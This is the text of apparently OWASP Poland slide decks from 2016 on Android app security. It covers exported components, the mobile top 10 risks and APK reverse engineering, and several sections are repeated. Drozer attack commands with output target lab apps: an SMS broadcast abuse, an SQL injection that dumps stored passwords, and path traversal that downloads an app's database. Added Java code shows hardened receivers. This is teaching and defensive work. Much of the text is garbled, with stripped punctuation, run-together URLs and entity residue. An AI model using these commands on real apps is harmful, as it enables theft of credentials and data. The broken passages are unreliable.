  run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
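Added example for the GoatDroid receiver shown above and the defenses just listed (not GoatDroid's own code): a receiver that only accepts the SOCIAL_SMS broadcast from senders holding a custom permission, a sender that targets its own package explicitly, and an onReceive that validates the extras before calling SmsManager. The custom permission name and the package are assumptions; the permission must also be declared with `<permission ... android:protectionLevel="signature" />` in the app's manifest.

```java
package org.example.fourgoats.hardened; // hypothetical package, not GoatDroid's code

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.telephony.SmsManager;

public class SafeSendSmsReceiver extends BroadcastReceiver {
    static final String ACTION = "org.owasp.goatdroid.fourgoats.SOCIAL_SMS";
    // Assumed custom permission; declared in the manifest at signature level so only
    // apps signed with the same certificate can hold it.
    static final String PERMISSION = "org.example.fourgoats.permission.SOCIAL_SMS";
    static final int MAX_SMS_LENGTH = 160;

    // Receiver side: the sender must hold PERMISSION, otherwise the system never
    // delivers the broadcast. The manifest equivalent is android:permission on the
    // <receiver>, or android:exported="false" when only this app ever sends it.
    // (On API 33+ registerReceiver additionally takes a RECEIVER_EXPORTED /
    // RECEIVER_NOT_EXPORTED flag; omitted here for the older signature.)
    public static SafeSendSmsReceiver register(Context ctx) {
        SafeSendSmsReceiver r = new SafeSendSmsReceiver();
        ctx.registerReceiver(r, new IntentFilter(ACTION), PERMISSION, null);
        return r;
    }

    // Sender side: explicit package so no other app's receiver is a candidate, and a
    // receiver permission so no other app's receiver could read the extras either.
    public static void sendSocialSms(Context ctx, String phoneNumber, String message) {
        Intent i = new Intent(ACTION).setPackage(ctx.getPackageName());
        i.putExtra("phoneNumber", phoneNumber);
        i.putExtra("message", message);
        ctx.sendBroadcast(i, PERMISSION);
    }

    @Override
    public void onReceive(Context context, Intent intent) {
        if (!ACTION.equals(intent.getAction())) {
            return;
        }
        String phoneNumber = intent.getStringExtra("phoneNumber");
        String message = intent.getStringExtra("message");
        // Validate the extras instead of handing attacker-controlled or null values
        // straight to SmsManager as the GoatDroid receiver does.
        if (!isValidNumber(phoneNumber) || !isValidMessage(message)) {
            return;
        }
        SmsManager.getDefault().sendTextMessage(phoneNumber, null, message, null, null);
    }

    static boolean isValidNumber(String n) {
        return n != null && n.matches("\\+?[0-9]{6,15}");
    }

    static boolean isValidMessage(String m) {
        return m != null && !m.isEmpty() && m.length() <= MAX_SMS_LENGTH;
    }
}
```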
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze package files at different stages:
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean "incorrectly"?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is done on the browser's side
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code
  if (presented_cert == pinned_cert)
      Start_connection();
  else
      Drop_connection();
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for end point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection – example
Insufficient transport layer protection – few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection ndash what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
bull Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection ndash how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
– http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepa@outlook.com
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files or the network stack).
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one by one with logcat running to check for sensitive info
• Fire off intents and wait for the result
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
• What info can they hold? – User's phone numbers – Passwords – SMS
• And one of the main problems is, again, permissions:
dz> run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database – Just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --vertical
Content providers attacks
• SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --selection "'"
unrecognized token: ")" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "'* FROM Key--"
| Password         | pin  |
| thisismypassword | 9876 |
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plugged in, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the intent and enjoy
Broadcast receivers attacks
Sample manifest from GoatDroid:
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // recipient and text are taken straight from the incoming Intent, with no check on who sent it
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all of the above-mentioned items:
• Setting the android:exported attribute to false (only the current app's user ID will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
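A hardened counterpart to the GoatDroid receiver above, applying both defenses from this slide (exported="false" and a custom permission), written here as an added example and not GoatDroid's own code; the permission name, the manifest fragment in the comment and the recipient format check are assumptions.

```java
import android.Manifest;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.content.pm.PackageManager;
import android.telephony.SmsManager;
import android.widget.Toast;

// Hypothetical hardened SendSMSNowReceiver (assumes minSdkVersion 23 for checkSelfPermission).
// Assumed manifest counterpart:
//   <permission android:name="org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS"
//               android:protectionLevel="signature" />
//   <receiver android:name=".broadcastreceivers.SendSMSNowReceiver"
//             android:exported="false"
//             android:permission="org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS" />
// With exported="false" the intent-filter is dropped on purpose: the receiver is reached only
// by explicit Intents from this app's own user ID, so a broadcast from another package
// (e.g. drozer's app.broadcast.send) is refused by the system before onReceive() runs.
public class SendSMSNowReceiver extends BroadcastReceiver {
    public static final String ACTION_SOCIAL_SMS = "org.owasp.goatdroid.fourgoats.SOCIAL_SMS";
    // assumed custom permission, signature-level so only same-signer apps can hold it
    public static final String PERMISSION_SOCIAL_SMS =
            "org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS";
    static final String EXTRA_PHONE = "phoneNumber";
    static final String EXTRA_MESSAGE = "message";

    @Override
    public void onReceive(Context context, Intent intent) {
        // Defense in depth: even a correctly guarded receiver validates what it is handed.
        if (!ACTION_SOCIAL_SMS.equals(intent.getAction())) return;
        String number = intent.getStringExtra(EXTRA_PHONE);
        String message = intent.getStringExtra(EXTRA_MESSAGE);
        if (!isValidRecipient(number) || message == null || message.isEmpty() || message.length() > 160) {
            return; // drop malformed input instead of texting an arbitrary number
        }
        if (context.checkSelfPermission(Manifest.permission.SEND_SMS) != PackageManager.PERMISSION_GRANTED) {
            return; // runtime permission not granted by the user
        }
        SmsManager.getDefault().sendTextMessage(number, null, message, null, null);
        Toast.makeText(context, "Text message sent", Toast.LENGTH_LONG).show();
    }

    /** Digits with an optional leading '+', 3 to 15 characters; an assumed recipient policy. */
    static boolean isValidRecipient(String number) {
        return number != null && number.matches("\\+?[0-9]{3,15}");
    }

    /** Sender side inside the same app: explicit package plus the custom permission, so the
     *  broadcast cannot be picked up by a foreign receiver registered for the same action. */
    public static void sendSocialSms(Context context, String number, String message) {
        Intent intent = new Intent(ACTION_SOCIAL_SMS)
                .setPackage(context.getPackageName())
                .putExtra(EXTRA_PHONE, number)
                .putExtra(EXTRA_MESSAGE, message);
        context.sendBroadcast(intent, PERMISSION_SOCIAL_SMS);
    }

    /** Runtime-registered alternative to the manifest entry: only senders that hold
     *  PERMISSION_SOCIAL_SMS may deliver to this receiver. */
    public static SendSMSNowReceiver register(Context context) {
        SendSMSNowReceiver receiver = new SendSMSNowReceiver();
        context.registerReceiver(receiver, new IntentFilter(ACTION_SOCIAL_SMS), PERMISSION_SOCIAL_SMS, null);
        return receiver;
    }
}
```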
References:
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or a reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in: – SQLite databases (local) – XML data stores – Plain text configuration files – Cookie stores – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze the package files at different stages:
adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the setStorageEncryption method)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure that shared preferences are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are: – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4) – Securing only part of the communication (e.g. only authentication) – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
if (presented_cert == pinned_cert)
    start_connection()
else
    drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection – how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid: mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain)
sslyze --regular www.example.com:443
Insufficient transport layer protection- example
Insufficient transport layer protection – a few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB: adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
